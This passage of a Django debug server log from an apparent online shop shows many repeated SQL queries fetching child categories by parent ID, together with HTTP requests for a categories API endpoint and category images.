140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-30 21:01:01,574 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-30 21:01:01,578 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-30 21:01:01,585 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-30 21:01:01,589 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-30 21:01:01,594 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-30 21:01:01,599 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-30 21:01:01,603 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-30 21:01:01,610 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-30 21:01:01,614 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-30 21:01:01,618 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-30 21:01:01,621 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-30 21:01:01,626 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-30 21:01:01,629 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-30 21:01:01,632 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-30 21:01:01,635 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-30 21:01:01,638 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-30 21:01:01,643 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-30 21:01:01,647 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [30/Dec/2019 21:01:01] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [30/Dec/2019 21:01:01] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [30/Dec/2019 21:01:01] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-30 21:01:12,219 utils 2749 140297222735616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-30 21:01:12,231 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-30 21:01:12,237 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-30 21:01:12,241 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-30 21:01:12,247 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-30 21:01:12,251 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-30 21:01:12,255 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-30 21:01:12,259 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-30 21:01:12,263 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-30 21:01:12,269 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-30 21:01:12,273 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-30 21:01:12,277 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-30 21:01:12,281 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-30 21:01:12,285 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-30 21:01:12,291 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-30 21:01:12,294 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-30 21:01:12,298 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-30 21:01:12,302 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-30 21:01:12,306 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-30 21:01:12,312 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-30 21:01:12,316 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-30 21:01:12,320 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-30 21:01:12,323 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-30 21:01:12,326 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-30 21:01:12,328 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-30 21:01:12,331 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-30 21:01:12,333 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-30 21:01:12,335 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-30 21:01:12,338 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-30 21:01:12,340 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-30 21:01:12,343 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-30 21:01:12,345 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-30 21:01:12,347 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-30 21:01:12,350 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-30 21:01:12,352 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-30 21:01:12,356 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-30 21:01:12,358 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-30 21:01:12,360 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-30 21:01:12,362 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-30 21:01:12,364 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-30 21:01:12,366 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-30 21:01:12,369 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-30 21:01:12,371 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-30 21:01:12,374 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-30 21:01:12,376 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-30 21:01:12,379 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [30/Dec/2019 21:01:12] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [30/Dec/2019 21:01:12] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [30/Dec/2019 21:01:12] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [30/Dec/2019 21:01:12] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [30/Dec/2019 21:01:12] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [30/Dec/2019 21:01:12] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [30/Dec/2019 21:01:12] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [30/Dec/2019 21:01:13] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [30/Dec/2019 21:01:13] "GET 